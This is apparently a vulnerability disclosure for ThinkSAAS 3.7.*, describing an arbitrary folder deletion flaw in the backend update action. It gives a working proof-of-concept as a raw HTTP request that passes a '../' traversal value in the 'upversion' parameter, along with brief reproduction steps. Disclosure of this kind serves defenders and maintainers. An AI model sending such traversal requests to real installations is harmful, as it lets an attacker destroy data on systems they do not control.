ThinkSAAS is a lightweight open source community system that can be used to build vertical networks.
ThinkSAAS is a simple, highly scalable community development system.
ThinkSAAS can help you quickly develop and build a unique communication community.
Github address:https://github.com/thinksaas/ThinkSAAS
There is an arbitrary folder deletion vulnerability in the backend of ThinkSAAS version 3.7.* This vulnerability allows attackers to delete any folder on the system through specially crafted requests or operations. Due to insufficient input path validation, attackers can construct malicious requests containing directory traversal sequences (such as../) to bypass security checks and delete specific directories.
In the thinksaas \\ app \\ system \\ action \\ update.php file
The delDir function was called to delete the folder, and the subversion here is controllable
burpsuite data packet
GET /index.php?app=system&ac=update&ts=threedo&upversion=../eee HTTP/1.1
Host: www.thinksaas.eek
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: <http://www.thinksaas.eek/index.php?app=system>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ts_email=admin%40admin.com; ts_autologin=tk7dxep9s0g8wo448o40c40sc8w4ko4
Connection: close
Log in to the backend as an administrator
Generate a target folder in the root directory
